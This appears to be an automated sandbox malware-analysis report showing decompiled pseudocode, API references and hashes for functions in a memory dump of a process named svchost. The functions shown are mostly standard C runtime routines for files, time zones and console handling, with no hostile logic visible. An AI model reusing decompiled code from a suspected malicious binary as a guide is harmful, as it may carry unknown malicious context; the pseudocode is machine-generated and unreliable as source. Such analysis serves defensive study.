                            0x00bd3223
                            0x00bd3225
                            0x00bd324b
                            0x00bd324e
                            0x00bd3251
                            0x00bd3254
                            0x00bd325b
                            0x00bd3260
                            0x00bd326b
                            0x00bd3270
                            0x00bd3276
                            0x00bd327b
                            0x00bd327b
                            0x00bd327e
                            0x00bd327e
                            0x00000000
                            0x00bd327e
                            0x00bd3262
                            0x00bd3265
                            0x00000000
                            0x00000000
                            0x00bd3267
                            0x00000000
                            0x00bd3267
                            0x00bd3229
                            0x00bd322a
                            0x00bd322c
                            0x00bd3243
                            0x00bd322e
                            0x00bd3233
                            0x00bd3239
                            0x00bd323e
                            0x00bd323e
                            0x00000000
                            0x00bd322c
                            0x00bd3157
                            0x00bd315a
                            0x00000000
                            0x00000000
                            0x00bd3168
                            0x00000000
                            0x00bd316d
                            0x00bd314f
                            0x00bd3115
                            0x00bd311d
                            0x00bd3123
                            0x00000000
                            0x00bd3123
                            0x00bd3103
                            0x00bd3106
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bd3106
                            0x00bd30c2
                            0x00bd30c9
                            0x00bd30d4
                            0x00000000
                            0x00bd30d4
                            0x00bd30b2
                            0x00000000

                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6b1f2f3c042dd4bc54a6ee99b67fa71162f66033f6cf343ff36baad638a9c8f6
                            • Instruction ID: 645d977ccdc2b0dbfaff8ab29338dc3d6e6ad25602876663470d1752d9dde34e
                            • Opcode Fuzzy Hash: 6b1f2f3c042dd4bc54a6ee99b67fa71162f66033f6cf343ff36baad638a9c8f6
                            • Instruction Fuzzy Hash: B9518171D0420AAACF159FA9CC45FAEFBF4EF15B10F14019AE405B7393EA709A41CB62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BDB2EE, Relevance: 4.6, APIs: 3, Instructions: 80COMMON
                            Download Yara Rule
                            C-Code - Quality: 74%
                            			E00BDB2EE(void* __edx, void* __eflags) {
				signed int _v8;
				char _v264;
				char _v268;
				char _v272;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t10;
				void* _t14;
				void* _t17;
				signed int _t21;
				void* _t27;
				signed int _t36;
				void* _t38;
				signed int _t42;
				signed int _t44;
				signed int _t45;

				_t10 =  *0xbec008; // 0xdc55bb75
				_v8 = _t10 ^ _t45;
				 *0xbec91c =  *0xbec91c | 0xffffffff;
				 *0xbec910 =  *0xbec910 | 0xffffffff;
				_push(_t38);
				_t25 = "TZ";
				_t36 = 0;
				 *0xbf6578 = 0;
				_t14 = E00BD6CC0("TZ", __edx, 0, _t38, __eflags,  &_v268,  &_v264, 0x100, "TZ");
				if(_t14 != 0) {
					__eflags = _t14 - 0x22;
					if(__eflags == 0) {
						_t44 = E00BD0A25(_t27, _v268);
						__eflags = _t44;
						if(__eflags != 0) {
							_t21 = E00BD6CC0(_t25, __edx, 0, _t44, __eflags,  &_v272, _t44, _v268, _t25);
							__eflags = _t21;
							if(_t21 == 0) {
								E00BD09EB(0);
								_t36 = _t44;
							} else {
								_push(_t44);
								goto L5;
							}
						} else {
							_push(0);
							L5:
							E00BD09EB();
						}
					}
				} else {
					_t36 =  &_v264;
				}
				asm("sbb esi, esi");
				_t42 =  ~(_t36 -  &_v264) & _t36;
				if(_t36 == 0) {
					L13:
					E00BDB193(__eflags); // executed
				} else {
					_t52 =  *_t36;
					if( *_t36 == 0) {
						goto L13;
					} else {
						_push(_t36);
						E00BDAFBE(_t52);
					}
				}
				_t17 = E00BD09EB(_t42);
				E00BC786A();
				return _t17;
			}





















                            0x00bdb2f9
                            0x00bdb300
                            0x00bdb303
                            0x00bdb310
                            0x00bdb318
                            0x00bdb31a
                            0x00bdb31f
                            0x00bdb32e
                            0x00bdb335
                            0x00bdb33f
                            0x00bdb349
                            0x00bdb34c
                            0x00bdb359
                            0x00bdb35c
                            0x00bdb35e
                            0x00bdb377
                            0x00bdb37f
                            0x00bdb381
                            0x00bdb387
                            0x00bdb38c
                            0x00bdb383
                            0x00bdb383
                            0x00000000
                            0x00bdb383
                            0x00bdb360
                            0x00bdb360
                            0x00bdb361
                            0x00bdb361
                            0x00bdb361
                            0x00bdb38e
                            0x00bdb341
                            0x00bdb341
                            0x00bdb341
                            0x00bdb39b
                            0x00bdb39d
                            0x00bdb3a1
                            0x00bdb3b1
                            0x00bdb3b1
                            0x00bdb3a3
                            0x00bdb3a3
                            0x00bdb3a6
                            0x00000000
                            0x00bdb3a8
                            0x00bdb3a8
                            0x00bdb3a9
                            0x00bdb3ae
                            0x00bdb3a6
                            0x00bdb3b7
                            0x00bdb3c5
                            0x00bdb3cd

                            APIs
                            • _free.LIBCMT ref: 00BDB361
                            • _free.LIBCMT ref: 00BDB3B7
                              • Part of subcall function 00BDB193: _free.LIBCMT ref: 00BDB1EB
                              • Part of subcall function 00BDB193: GetTimeZoneInformation.KERNELBASE(?,00000000,00000000,00000000,?,00BE9410), ref: 00BDB1FD
                              • Part of subcall function 00BDB193: WideCharToMultiByte.KERNEL32(00000000,00000000,Pacific Standard Time,000000FF,00000000,0000003F,00000000,?,?), ref: 00BDB275
                              • Part of subcall function 00BDB193: WideCharToMultiByte.KERNEL32(00000000,00000000,Pacific Daylight Time,000000FF,?,0000003F,00000000,?), ref: 00BDB2A2
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: _free$ByteCharMultiWide$InformationTimeZone
                            • String ID:
                            • API String ID: 314583886-0
                            • Opcode ID: 475fcbf16e82d4c56ff4032e5634204508d2a31199865ebadcd78f6ef496a36b
                            • Instruction ID: f73aa9235887102a54a9830897f76a1018698745e2d2808f339524419713c613
                            • Opcode Fuzzy Hash: 475fcbf16e82d4c56ff4032e5634204508d2a31199865ebadcd78f6ef496a36b
                            • Instruction Fuzzy Hash: 89212976800218D6DB35A6259C82EEAF7F8DB51370F1202D7E894A3381FF704E85D695
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BD18F4, Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00BD18F4(void* __eflags, signed int _a4) {
				intOrPtr _t13;
				int _t15;
				void* _t21;
				signed int _t33;
				long _t35;

				_t33 = _a4;
				if(E00BCE926(_t33) != 0xffffffff) {
					_t13 =  *0xbf6108; // 0xe0a500
					if(_t33 != 1 || ( *(_t13 + 0x88) & 0x00000001) == 0) {
						if(_t33 != 2 || ( *(_t13 + 0x58) & 0x00000001) == 0) {
							goto L7;
						} else {
							goto L6;
						}
					} else {
						L6:
						_t21 = E00BCE926(2);
						if(E00BCE926(1) == _t21) {
							goto L1;
						}
						L7:
						_t15 = FindCloseChangeNotification(E00BCE926(_t33)); // executed
						if(_t15 != 0) {
							goto L1;
						}
						_t35 = GetLastError();
						L9:
						E00BCE895(_t33);
						 *((char*)( *((intOrPtr*)(0xbf6108 + (_t33 >> 6) * 4)) + 0x28 + (_t33 & 0x0000003f) * 0x30)) = 0;
						if(_t35 == 0) {
							return 0;
						}
						return E00BCC998(_t35) | 0xffffffff;
					}
				}
				L1:
				_t35 = 0;
				goto L9;
			}








                            0x00bd18fb
                            0x00bd1908
                            0x00bd190e
                            0x00bd1916
                            0x00bd1924
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bd192c
                            0x00bd192c
                            0x00bd192e
                            0x00bd1940
                            0x00000000
                            0x00000000
                            0x00bd1942
                            0x00bd194a
                            0x00bd1952
                            0x00000000
                            0x00000000
                            0x00bd195a
                            0x00bd195c
                            0x00bd195d
                            0x00bd1975
                            0x00bd197c
                            0x00000000
                            0x00bd198a
                            0x00000000
                            0x00bd1985
                            0x00bd1916
                            0x00bd190a
                            0x00bd190a
                            0x00000000

                            APIs
                            • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,00BD1812,?), ref: 00BD194A
                            • GetLastError.KERNEL32(?,00BD1812,?), ref: 00BD1954
                            • __dosmaperr.LIBCMT ref: 00BD197F
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                            • String ID:
                            • API String ID: 490808831-0
                            • Opcode ID: 5a1a84e88ebd24ffd9d85538f602de16fd2cf5c76908a7882cb156b8d7f42b8c
                            • Instruction ID: bcb90055afd35b8a1550d97581d9db2b4f95aab8b160c37cc0d63313617daa17
                            • Opcode Fuzzy Hash: 5a1a84e88ebd24ffd9d85538f602de16fd2cf5c76908a7882cb156b8d7f42b8c
                            • Instruction Fuzzy Hash: F2010832A0421476DA75237CA875B7DA7C9CB81775F2505DEE8299B3C3EEB8DC838190
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BD276E, Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 86%
                            			E00BD276E(void* __ecx, void* __eflags, signed int _a4, union _LARGE_INTEGER _a8, union _LARGE_INTEGER* _a12, intOrPtr _a16) {
				signed int _v8;
				void* _v12;
				void* _t15;
				int _t16;
				signed int _t19;
				signed int _t32;
				signed int _t33;
				signed int _t36;

				_t36 = _a4;
				_push(_t32);
				_t15 = E00BCE926(_t36);
				_t33 = _t32 | 0xffffffff;
				if(_t15 != _t33) {
					_push(_a16);
					_t16 = SetFilePointerEx(_t15, _a8, _a12,  &_v12); // executed
					if(_t16 != 0) {
						if((_v12 & _v8) == _t33) {
							goto L2;
						} else {
							_t19 = _v12;
							_t39 = (_t36 & 0x0000003f) * 0x30;
							 *( *((intOrPtr*)(0xbf6108 + (_t36 >> 6) * 4)) + _t39 + 0x28) =  *( *((intOrPtr*)(0xbf6108 + (_t36 >> 6) * 4)) + 0x28 + (_t36 & 0x0000003f) * 0x30) & 0x000000fd;
						}
					} else {
						E00BCC998(GetLastError());
						goto L2;
					}
				} else {
					 *((intOrPtr*)(E00BCC9CE())) = 9;
					L2:
					_t19 = _t33;
				}
				return _t19;
			}











                            0x00bd2776
                            0x00bd2779
                            0x00bd277b
                            0x00bd2780
                            0x00bd2786
                            0x00bd2799
                            0x00bd27a7
                            0x00bd27af
                            0x00bd27ca
                            0x00000000
                            0x00bd27cc
                            0x00bd27cc
                            0x00bd27d7
                            0x00bd27e1
                            0x00bd27e1
                            0x00bd27b1
                            0x00bd27b8
                            0x00000000
                            0x00bd27bd
                            0x00bd2788
                            0x00bd278d
                            0x00bd2793
                            0x00bd2793
                            0x00bd2795
                            0x00bd27eb

                            APIs
                            • SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,?,00000000,?,00000000,?,?,?,00BD281D,?,00000000,00000002,00000000), ref: 00BD27A7
                            • GetLastError.KERNEL32(?,00BD281D,?,00000000,00000002,00000000,?,00BD3143,00000000,00000000,00000000,00000002,00000000,?,00000000), ref: 00BD27B1
                            • __dosmaperr.LIBCMT ref: 00BD27B8
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ErrorFileLastPointer__dosmaperr
                            • String ID:
                            • API String ID: 2336955059-0
                            • Opcode ID: d74e7f7bd27a0a5f0a2e088d0f7fae0308ba25fd7660655a9f0aee226c63ec2d
                            • Instruction ID: 7820ddce9f5f1defbc10987eae1e93d047a4f985c6bb35140995f0b629dcaaaa
                            • Opcode Fuzzy Hash: d74e7f7bd27a0a5f0a2e088d0f7fae0308ba25fd7660655a9f0aee226c63ec2d
                            • Instruction Fuzzy Hash: FD019033614144ABCF219F58DC41DAD7B69EB81330B240289F8149B391FAB0DD408790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BCE238, Relevance: 4.5, APIs: 3, Instructions: 17COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00BCE238(WCHAR* _a4) {
				int _t2;

				_t2 = RemoveDirectoryW(_a4); // executed
				if(_t2 != 0) {
					return 0;
				} else {
					return E00BCC998(GetLastError()) | 0xffffffff;
				}
			}




                            0x00bce240
                            0x00bce248
                            0x00bce25f
                            0x00bce24a
                            0x00bce25b
                            0x00bce25b

                            APIs
                            • RemoveDirectoryW.KERNELBASE(00BC4374,?,00BC4374,?), ref: 00BCE240
                            • GetLastError.KERNEL32(?,00BC4374,?), ref: 00BCE24A
                            • __dosmaperr.LIBCMT ref: 00BCE251
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: DirectoryErrorLastRemove__dosmaperr
                            • String ID:
                            • API String ID: 4061612599-0
                            • Opcode ID: 16b236dd2121b1d2af592046a8ff0183f544c07b13a8c60f77ff51d1027ef240
                            • Instruction ID: cde5b174ab2b04e0aab62dbfe938e5b7c98f3fbe45f9216ca1960af5ff1e2683
                            • Opcode Fuzzy Hash: 16b236dd2121b1d2af592046a8ff0183f544c07b13a8c60f77ff51d1027ef240
                            • Instruction Fuzzy Hash: EDD0123215524CA78F403BF6BC09F163F9DDA813747100659F43CCA5A1EE71C890A654
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BCEF70, Relevance: 4.5, APIs: 3, Instructions: 17fileCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00BCEF70(WCHAR* _a4) {
				int _t2;

				_t2 = DeleteFileW(_a4); // executed
				if(_t2 != 0) {
					return 0;
				} else {
					return E00BCC998(GetLastError()) | 0xffffffff;
				}
			}




                            0x00bcef78
                            0x00bcef80
                            0x00bcef97
                            0x00bcef82
                            0x00bcef93
                            0x00bcef93

                            APIs
                            • DeleteFileW.KERNELBASE(?,?,00BC46DC,?,?,?), ref: 00BCEF78
                            • GetLastError.KERNEL32(?,?), ref: 00BCEF82
                            • __dosmaperr.LIBCMT ref: 00BCEF89
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: DeleteErrorFileLast__dosmaperr
                            • String ID:
                            • API String ID: 1545401867-0
                            • Opcode ID: 7c94832780852409f18576841389d357e0f63060f1452103fe6d2a82d939ec8d
                            • Instruction ID: 2958a7887ced5ec585dbff1f4f1e1e59968a763095b42011f034e1540b74eda9
                            • Opcode Fuzzy Hash: 7c94832780852409f18576841389d357e0f63060f1452103fe6d2a82d939ec8d
                            • Instruction Fuzzy Hash: 1CD0123215424C6BDB107BF5BC49A1A3F9DDE907747100659F43CCA4A1DE71C8908652
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BCEDBE, Relevance: 3.1, APIs: 2, Instructions: 132COMMON
                            Download Yara Rule
                            C-Code - Quality: 87%
                            			E00BCEDBE(signed int** __edx, void* __eflags) {
				signed int* _t26;
				int _t31;
				intOrPtr* _t32;
				void* _t36;
				intOrPtr _t38;
				signed int* _t40;
				int _t41;
				void* _t42;
				intOrPtr _t55;
				signed int _t57;
				intOrPtr* _t59;
				void* _t61;
				void* _t62;

				_t54 = __edx;
				E00BC8310(__edx, 0xbea620, 0x18);
				_t40 =  *(_t62 + 0xc);
				if(_t40 == 4 || _t40 == 3) {
					_push( *((intOrPtr*)(_t62 + 8)));
					goto L34;
				} else {
					_t55 =  *((intOrPtr*)(_t62 + 8));
					if(_t55 == 2 || _t55 == 0x15 || _t55 == 0x16 || _t55 == 6 || _t55 == 0xf) {
						_t41 = 0;
						 *((char*)(_t62 - 0x19)) = 0;
						 *(_t62 - 0x28) = 0;
						 *(_t62 - 0x20) = 0;
						E00BD5FFE(3);
						 *((intOrPtr*)(_t62 - 4)) = 0;
						if(_t55 == 2 || _t55 == 0x15) {
							if( *0xbf5e90 == 0) {
								_t31 = SetConsoleCtrlHandler(E00BCEA12, 1); // executed
								if(_t31 == 0) {
									_t32 = E00BCC9BB();
									 *_t32 = GetLastError();
									_t41 = 1;
									 *((char*)(_t62 - 0x19)) = 1;
								} else {
									 *0xbf5e90 = 1;
								}
							}
						}
						_t26 = E00BCEAC0(_t55);
						 *(_t62 - 0x28) = _t26;
						if(_t26 != 0) {
							_t57 =  *0xbec008; // 0xdc55bb75
							asm("ror esi, cl");
							 *(_t62 - 0x20) = _t57 ^  *_t26;
							_t29 =  *(_t62 + 0xc);
							if( *(_t62 + 0xc) != 2) {
								 *( *(_t62 - 0x28)) = E00BCF6AC(_t29);
							}
						}
						 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
						E00BCEF58();
						if(_t41 != 0) {
							goto L10;
						} else {
							goto L35;
						}
					} else {
						if(_t55 == 8 || _t55 == 4 || _t55 == 0xb) {
							_t59 = E00BD44A9(_t42);
							if(_t59 == 0) {
								goto L10;
							}
							if( *_t59 != 0xbe5190) {
								L15:
								 *((intOrPtr*)(_t62 - 0x24)) =  *_t59;
								_t36 = E00BCEB02(_t55,  *_t59);
								if(_t36 == 0) {
									goto L10;
								}
								_t4 = _t36 + 8; // 0x8
								_t54 = _t4;
								 *(_t62 - 0x28) =  *_t54;
								if(_t40 == 2) {
									L21:
									goto L35;
								}
								_t61 =  *0xbe5220 * 0xc +  *((intOrPtr*)(_t62 - 0x24));
								if(_t36 == _t61) {
									goto L21;
								}
								while( *((intOrPtr*)(_t54 - 4)) == _t55) {
									 *_t54 = _t40;
									_t54 =  &(_t54[3]);
									_t8 = _t54 - 8; // -12
									if(_t8 != _t61) {
										continue;
									}
									break;
								}
								goto L21;
							}
							_t38 = E00BD0A25(_t42,  *0xbe5224);
							 *_t59 = _t38;
							if(_t38 == 0) {
								goto L10;
							} else {
								E00BC89A0(_t38, 0xbe5190,  *0xbe5224);
								goto L15;
							}
						} else {
							L10:
							_push(_t55);
							L34:
							E00BCEB2A();
							L35:
							return E00BC8356(_t54);
						}
					}
				}
			}
















                            0x00bcedbe
                            0x00bcedc5
                            0x00bcedca
                            0x00bcedd0
                            0x00bcef61
                            0x00000000
                            0x00bceddf
                            0x00bceddf
                            0x00bcede5
                            0x00bceea5
                            0x00bceea7
                            0x00bceeac
                            0x00bceeaf
                            0x00bceeb4
                            0x00bceeba
                            0x00bceec0
                            0x00bceece
                            0x00bceed7
                            0x00bceedf
                            0x00bceeea
                            0x00bceef7
                            0x00bceef9
                            0x00bceefb
                            0x00bceee1
                            0x00bceee1
                            0x00bceee1
                            0x00bceedf
                            0x00bceece
                            0x00bcef02
                            0x00bcef0a
                            0x00bcef0f
                            0x00bcef11
                            0x00bcef1e
                            0x00bcef20
                            0x00bcef23
                            0x00bcef29
                            0x00bcef35
                            0x00bcef35
                            0x00bcef29
                            0x00bcef37
                            0x00bcef3e
                            0x00bcef45
                            0x00000000
                            0x00bcef4b
                            0x00000000
                            0x00bcef4b
                            0x00bcee0f
                            0x00bcee12
                            0x00bcee29
                            0x00bcee2d
                            0x00000000
                            0x00000000
                            0x00bcee35
                            0x00bcee5d
                            0x00bcee5f
                            0x00bcee64
                            0x00bcee6d
                            0x00000000
                            0x00000000
                            0x00bcee6f
                            0x00bcee6f
                            0x00bcee74
                            0x00bcee7a
                            0x00bcee9e
                            0x00000000
                            0x00bcee9e
                            0x00bcee83
                            0x00bcee88
                            0x00000000
                            0x00000000
                            0x00bcee8a
                            0x00bcee8f
                            0x00bcee91
                            0x00bcee94
                            0x00bcee99
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bcee99
                            0x00000000
                            0x00bcee9b
                            0x00bcee3d
                            0x00bcee43
                            0x00bcee47
                            0x00000000
                            0x00bcee49
                            0x00bcee55
                            0x00000000
                            0x00bcee5a
                            0x00bcee1e
                            0x00bcee1e
                            0x00bcee1e
                            0x00bcef64
                            0x00bcef64
                            0x00bcef6a
                            0x00bcef6f
                            0x00bcef6f
                            0x00bcee12
                            0x00bcede5

                            APIs
                            • SetConsoleCtrlHandler.KERNELBASE(00BCEA12,00000001,00BEA620,00000018,00BC4440,00000016,00000001,?,?,00001000,00BC26B4,?,00000000), ref: 00BCEED7
                            • GetLastError.KERNEL32 ref: 00BCEEF1
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ConsoleCtrlErrorHandlerLast
                            • String ID:
                            • API String ID: 3113525192-0
                            • Opcode ID: bd80bf5b3ff642ee176c3374ab91e814799070ce6a900a5d24022b86d836887b
                            • Instruction ID: a09d45cf2bd91269e0b5677a7397cb3c76fdb37911abc0431a753e22a7ed8e7e
                            • Opcode Fuzzy Hash: bd80bf5b3ff642ee176c3374ab91e814799070ce6a900a5d24022b86d836887b
                            • Instruction Fuzzy Hash: 1341DE72A00646CBEF759F68C885FAD7BE2EB59350B1800DDF425AB261DB31DC80C751
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BCCA68, Relevance: 3.1, APIs: 2, Instructions: 101COMMON
                            Download Yara Rule
                            C-Code - Quality: 62%
                            			E00BCCA68(WCHAR* _a4, void* _a8) {
				void* _v8;
				void _v56;
				void* __edi;
				signed int _t17;
				void* _t18;
				signed int _t19;
				signed int _t20;
				intOrPtr* _t25;
				signed int _t26;
				signed int _t34;
				signed int _t36;
				void* _t39;
				signed int _t42;
				signed int _t44;
				void* _t45;
				WCHAR* _t49;
				void* _t56;
				intOrPtr _t59;
				void* _t60;
				void* _t62;

				if(_a8 != 0) {
					_push(_t45);
					_t34 = 0;
					E00BC8520(_t45,  &_v56, 0, 0x30);
					_t36 = 0xc;
					memcpy(_a8,  &_v56, _t36 << 2);
					_t62 = _t60 + 0x18;
					_t49 = _a4;
					__eflags = _t49;
					if(_t49 != 0) {
						_t17 = E00BD5190(_t49, L"?*");
						_pop(_t39);
						__eflags = _t17;
						if(_t17 == 0) {
							_t18 = CreateFileW(_t49, 0x80, 7, 0, 3, 0x2000000, 0); // executed
							_push(_a8);
							_t56 = _t18;
							_v8 = _t56;
							__eflags = _t56 - 0xffffffff;
							if(__eflags == 0) {
								_push(_t49);
								_t19 = E00BCCB6F(_t39, _t44, _t49, __eflags);
							} else {
								_push(_t56);
								_push(0xffffffff);
								_push(_t49);
								_t19 = E00BCCBFB(_t44);
								_t62 = _t62 + 0x10;
							}
							__eflags = _t19;
							if(_t19 == 0) {
								E00BC8520(_t49,  &_v56, _t34, 0x30);
								_t34 = _t34 | 0xffffffff;
								__eflags = _t34;
								_t42 = 0xc;
								memcpy(_a8,  &_v56, _t42 << 2);
								_t56 = _v8;
							}
							__eflags = _t56 - 0xffffffff;
							if(_t56 != 0xffffffff) {
								CloseHandle(_t56);
							}
							_t20 = _t34;
							L15:
							return _t20;
						}
						_t25 = E00BCC9CE();
						_t59 = 2;
						 *_t25 = _t59;
						_t26 = E00BCC9BB();
						 *_t26 = _t59;
						L6:
						_t20 = _t26 | 0xffffffff;
						goto L15;
					}
					 *(E00BCC9BB()) = 0;
					 *((intOrPtr*)(E00BCC9CE())) = 0x16;
					_t26 = E00BD1788();
					goto L6;
				}
				 *(E00BCC9BB()) =  *_t29 & 0x00000000;
				 *((intOrPtr*)(E00BCC9CE())) = 0x16;
				return E00BD1788() | 0xffffffff;
			}























                            0x00bcca74
                            0x00bcca98
                            0x00bcca9b
                            0x00bccaa2
                            0x00bccab2
                            0x00bccab3
                            0x00bccab3
                            0x00bccab5
                            0x00bccab8
                            0x00bccaba
                            0x00bccadb
                            0x00bccae1
                            0x00bccae2
                            0x00bccae4
                            0x00bccb0d
                            0x00bccb13
                            0x00bccb16
                            0x00bccb18
                            0x00bccb1b
                            0x00bccb1e
                            0x00bccb2e
                            0x00bccb2f
                            0x00bccb20
                            0x00bccb20
                            0x00bccb21
                            0x00bccb23
                            0x00bccb24
                            0x00bccb29
                            0x00bccb29
                            0x00bccb36
                            0x00bccb38
                            0x00bccb41
                            0x00bccb4f
                            0x00bccb4f
                            0x00bccb54
                            0x00bccb55
                            0x00bccb57
                            0x00bccb57
                            0x00bccb5a
                            0x00bccb5d
                            0x00bccb60
                            0x00bccb60
                            0x00bccb66
                            0x00bccb68
                            0x00000000
                            0x00bccb6a
                            0x00bccae6
                            0x00bccaed
                            0x00bccaee
                            0x00bccaf0
                            0x00bccaf5
                            0x00bccaf7
                            0x00bccaf7
                            0x00000000
                            0x00bccaf7
                            0x00bccac1
                            0x00bccac8
                            0x00bccace
                            0x00000000
                            0x00bccace
                            0x00bcca7b
                            0x00bcca83
                            0x00000000

                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 773d7f38ceb036a4f5e3af9875c8baa617566c7472c25bffb9b3bccefcadf1b0
                            • Instruction ID: f0de4c3dc31bde5c32b23e09d9b28a932663bd49cee2a7f28384d8d4f4b2e188
                            • Opcode Fuzzy Hash: 773d7f38ceb036a4f5e3af9875c8baa617566c7472c25bffb9b3bccefcadf1b0
